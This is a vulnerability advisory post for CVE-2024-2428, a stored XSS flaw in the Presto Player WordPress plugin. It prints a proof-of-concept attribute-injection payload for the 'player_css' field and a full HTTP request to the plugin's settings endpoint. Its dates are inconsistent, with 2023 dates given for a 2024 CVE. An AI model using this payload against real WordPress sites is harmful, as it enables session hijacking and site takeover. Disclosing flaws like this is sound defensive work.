A critical security flaw has been uncovered in “The Ultimate Video Player For WordPress – by Presto Player” plugin, tagged as CVE-2024-2428. This vulnerability jeopardizes over 100,000 WordPress installations, enabling attackers to execute Stored Cross-Site Scripting (XSS) attacks, potentially leading to Admin Account Creation.
Main info:
CVE | CVE-2024-2428 |
Plugin | The Ultimate Video Player For WordPress – by Presto Player < 2.2.3 |
Critical | High |
All Time | 1 797 539 |
Active installations | 100 000+ |
Publicly Published | March 15, 2023 |
Last Updated | March 15, 2023 |
Researcher | Dmtirii Ignatyev |
OWASP TOP-10 | A7: Cross-Site Scripting (XSS) |
PoC | Yes |
Exploit | No |
Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2428 https://wpscan.com/vulnerability/4832e223-4571-4b45-97db-2fd403797c49/ |
Plugin Security Certification by CleanTalk | |
Timeline
March 4, 2023 | Plugin testing and vulnerability detection in the The Ultimate Video Player For WordPress – by Presto Player have been completed |
March 4, 2023 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
March 15, 2024 | Registered CVE-2024-2428 |
Discovery of the Vulnerability
During routine plugin testing, security researchers stumbled upon a significant vulnerability within the plugin’s functionality. This flaw allows attackers to inject malicious JavaScript code, paving the way for unauthorized account takeovers.
Understanding of Stored XSS attack’s
Stored XSS is a prevalent attack vector where malicious scripts are injected into a web application’s database. When the compromised data is retrieved and rendered, the injected script executes in the victim’s browser context. Real-world examples demonstrate how attackers leverage this vulnerability to hijack user sessions, deface websites, or launch more sophisticated attacks.
Exploiting the Stored XSS Vulnerability
To exploit CVE-2024-2428, attackers can manipulate the “player_css” field in the plugin’s settings with crafted JavaScript payloads. Once executed, these scripts can initiate actions within the admin interface, potentially leading to the creation of unauthorized admin accounts.
POC:
Go to “Add New Post” and try to change filed “player_css” to this – 123″asdasd=” onmouseover=’alert(1)’ P.S. you should go to page with any players
Requests: POST /wordpress/index.php/wp-json/presto-player/v1/settings?_locale=user HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: application/json, */*;q=0.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-WP-Nonce: 1713ddbbe0 Content-Type: application/json Origin: http://127.0.0.1 Content-Length: 116 DNT: 1 Connection: close Cookie: wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1709575790%7C7NrVNWbsp3b6AEj5va22HZWBn4nNcpQ9XzW09wokBFn%7Ce26eb708b0c24aa6fb0a7136de79e4a857038e3a320aa4bdfcd3fea3d4e30089; wp-settings-time-2=1709403214 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin {"presto_player_branding":{"logo":"","color":"#000000","logo_width":150,"player_css":"123\"onmouseover='alert(1)'"}}
___
The ramifications of this vulnerability are severe. Attackers could compromise website integrity, harvest sensitive data, or distribute malware. Furthermore, unauthorized admin account creation could grant attackers full control over affected WordPress installations, enabling them to carry out malicious activities undetected.
Recommendations for Improved Security
Website administrators are strongly urged to update “The Ultimate Video Player For WordPress” plugin to the latest patched version immediately. Additionally, regular security audits and monitoring mechanisms should be in place to detect and mitigate potential vulnerabilities promptly. Lastly, enforcing secure coding practices and implementing robust input validation mechanisms can help thwart similar attacks in the future. Stay vigilant and prioritize website security!
By taking proactive measures to address Stored XSS vulnerabilities like CVE-2024-2428, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #StoredXSS #WebsiteSafety #StayProtected #HighVulnerability
Use CleanTalk solutions to improve the security of your website
DMITRII I.